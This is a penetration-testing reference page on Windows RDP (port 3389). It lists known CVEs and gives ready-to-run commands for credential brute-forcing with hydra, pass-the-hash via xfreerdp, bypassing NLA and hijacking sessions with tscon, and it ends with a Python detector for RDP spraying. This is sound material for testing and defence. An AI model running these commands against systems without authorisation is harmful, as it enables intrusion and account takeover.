Service bank
REMOTE ACCESS 3389/tcp

RDP

aka Remote Desktop, mstsc, xrdp

Windows Remote Desktop on 3389. Useful for credential spraying and pass-the-hash (restricted admin), leaks domain info pre-auth, and carries wormable CVEs on old hosts.

Ports

Port   Proto   Notes
3389   tcp     RDP

Fingerprint

  • nmap rdp-ntlm-info leaks hostname, domain and OS build pre-auth
  • TLS certificate often names the host

Default / weak creds

  • valid domain/local creds, or an NT hash with restricted admin mode

Known CVEs

CVE             Impact
CVE-2019-0708   BlueKeep, pre-auth wormable RCE (Win7/2008)
CVE-2019-1181   DejaBlue, RDP RCE on newer Windows

Exploitation primitives

  • Credential spray with nxc rdp / hydra
  • Pass-the-hash via restricted admin mode (xfreerdp /pth:)
  • rdp-ntlm-info for domain recon; session hijack with tscon as SYSTEM

Overview

RDP on 3389 is the graphical way onto a Windows host. Even before logging in it leaks domain and build info, and with a password or hash it is a direct interactive session.

Enumeration

Leak domain info pre-auth:

nmap -p3389 --script rdp-ntlm-info <TARGET>

Check encryption / NLA status:

nmap -p3389 --script rdp-enum-encryption <TARGET>

Validate credentials:

nxc rdp <TARGET> -u user -p pass

Brute force:

hydra -t 4 -L users.txt -P passes.txt rdp://<TARGET>

Connecting

Basic connect (self-signed cert is common — /cert:ignore is almost always needed):

xfreerdp /v:<TARGET> /u:user /p:pass /cert:ignore +clipboard /dynamic-resolution

No password (blank/empty):

xfreerdp /v:<TARGET> /u:Administrator /p:'' /cert:ignore

Domain user:

xfreerdp /v:<TARGET> /d:<DOMAIN> /u:user /p:pass /cert:ignore +clipboard /dynamic-resolution

Non-standard port:

xfreerdp /v:<TARGET>:<PORT> /u:user /p:pass /cert:ignore

Force old RDP security layer (bypasses NLA on unpatched hosts):

xfreerdp /v:<TARGET> /u:user /p:pass /sec:rdp /cert:ignore

Share a local folder into the session (useful for file transfers):

xfreerdp /v:<TARGET> /u:user /p:pass /cert:ignore /drive:share,/tmp

rdesktop alternative:

rdesktop -u user -p pass <TARGET>

Pass-the-hash

Restricted admin mode must be enabled on the target (common on modern Windows):

xfreerdp /v:<TARGET> /u:Administrator /pth:<NThash> /cert:ignore /restricted-admin

Domain PTH:

xfreerdp /v:<TARGET> /d:<DOMAIN> /u:Administrator /pth:<NThash> /cert:ignore /restricted-admin

Session hijack (as SYSTEM)

List active sessions:

query session

Hijack another session without a password:

tscon <SESSION_ID> /dest:<YOUR_SESSION_NAME>

Hardening

Require NLA, restrict RDP to admins, enable account lockout, and patch BlueKeep-class CVEs.
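Detection logic for the credential spraying described under Enumeration, as an added example (not part of the original page): it parses constructed Windows Security 4625 (failed logon) lines and flags any source address that fails RDP-type logons against several distinct accounts inside a short window. The log line format, the sample events and the thresholds are assumptions for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security 4625 (failed logon) events, one per line.
# LogonType 10 = RemoteInteractive (RDP); with NLA on, the failure is often
# recorded as LogonType 3 instead, so both are treated as RDP attempts.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01 EventID=4625 LogonType=10 TargetUserName=alice IpAddress=10.0.0.5
2024-05-01T10:00:02 EventID=4625 LogonType=10 TargetUserName=bob IpAddress=10.0.0.5
2024-05-01T10:00:03 EventID=4625 LogonType=3 TargetUserName=carol IpAddress=10.0.0.5
2024-05-01T10:00:04 EventID=4625 LogonType=10 TargetUserName=dave IpAddress=10.0.0.5
2024-05-01T10:00:05 EventID=4625 LogonType=10 TargetUserName=erin IpAddress=10.0.0.5
2024-05-01T10:00:06 EventID=4624 LogonType=10 TargetUserName=alice IpAddress=10.0.0.9
2024-05-01T10:00:07 EventID=4625 LogonType=10 TargetUserName=alice IpAddress=10.0.0.9
2024-05-01T10:00:08 EventID=4625 LogonType=2 TargetUserName=frank IpAddress=10.0.0.7
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<id>\d+) LogonType=(?P<lt>\d+) "
    r"TargetUserName=(?P<user>\S+) IpAddress=(?P<ip>\S+)$"
)
RDP_LOGON_TYPES = {"3", "10"}

def parse_events(text):
    """Yield (timestamp, event_id, logon_type, user, ip) per well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield (datetime.fromisoformat(m["ts"]), m["id"], m["lt"], m["user"], m["ip"])

def detect_rdp_spray(text, window=timedelta(minutes=5), min_users=3):
    """Map source IP -> sorted distinct accounts, for sources whose failed RDP-type
    logons hit at least `min_users` different accounts inside one `window`."""
    failures = defaultdict(list)  # ip -> [(timestamp, user)]
    for ts, eid, lt, user, ip in parse_events(text):
        if eid == "4625" and lt in RDP_LOGON_TYPES:
            failures[ip].append((ts, user))
    hits = {}
    for ip, events in failures.items():
        events.sort()
        # Slide a window over this source's failures and count distinct accounts.
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - start <= window}
            if len(users) >= min_users:
                hits[ip] = sorted(users)
                break
    return hits
```

A single repeated failure against one account (10.0.0.9) and a non-RDP logon type (10.0.0.7) are not flagged; only the multi-account burst from 10.0.0.5 is.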

References